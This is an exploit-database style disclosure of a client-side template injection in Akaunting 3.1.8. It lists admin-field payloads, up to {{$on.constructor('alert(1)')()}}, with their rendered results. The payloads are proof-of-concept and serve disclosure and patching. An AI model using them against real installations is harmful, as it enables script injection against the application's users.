Akaunting 3.1.8 Client-Side Template Injection

# Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI# Exploit Author: tmrswrr# Date: 30/05/2024# Vendor: https://akaunting.com/forum# Software Link: https://akaunting.com/apps/crm# Vulnerable Version(s): 3.1.81 ) Login with admin cred and go to : Currencies > New Currency    https://127.0.0.1/Akaunting/1/settings/currencies2 ) Write SSTI payload : {{ Object.keys(this) }} Name field 3 ) Save it 4 ) You will be see result :     "_uid",  "_isVue",  "__v_skip",  "_scope",  "$options",  "_renderProxy",  "_self",  "$parent",  "$root",  "$children",  "$refs",    > {{ this.$root.$data }}  >  "form": {},  "bulk_action": {    "path": "currencies",    "count": "",    "value": "*",    "message": "",    "type": "",    "show": false,    "modal": false,    "loading": false,    "selected": [],      > {{ Object.keys(this._self) }}   > "_uid",      "_isVue",      "__v_skip",      "_scope",      "$options",      "_renderProxy",      "_self",      "$parent",      "$root",      "$children",      "$refs",    > {{$on.constructor('alert(1)')()}}    > You will be see alert box=======================================================================================1 ) Login with admin cred and go to : Items > New Item    https://127.0.0.1/Akaunting/1/common/items2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers3 ) Save it 4 ) You will be see result :     49    ====================================================================================1 ) Login with admin cred and go to :Settings > Taxes > New Tax    https://127.0.0.1/Akaunting/1/settings/taxes/1/edit2 ) Write SSTI payload : {{7*7}}  Name field , write Sale and Purchase Price random numbers3 ) Save it 4 ) You will be see result :     49    > {{'a'.toUpperCase()}}    > A    > {{'a'.concat('b')}}    > ab====================================================================================1 ) Login with admin cred and go to : Banking > Transactions > New Incomehttps://127.0.0.1/Akaunting/1/banking/transactions/create?type=income2 ) Write SSTI payload : {{7*7}}  Description field3 ) Save it 4 ) You will be see result :     49    > {{'a'.toUpperCase()}}    > A    > {{'a'.concat('b')}}    > ab    =======================================================================================1 ) Login with admin credhttps://127.0.0.1/Akaunting/1/purchases/vendors/1/edit2 ) Write SSTI payload : {{7*7}}  Name field3 ) Save it 4 ) You will be see result :     49    > {{'a'.toUpperCase()}}    > A    > {{'a'.concat('b')}}    > ab    > {{self}}    >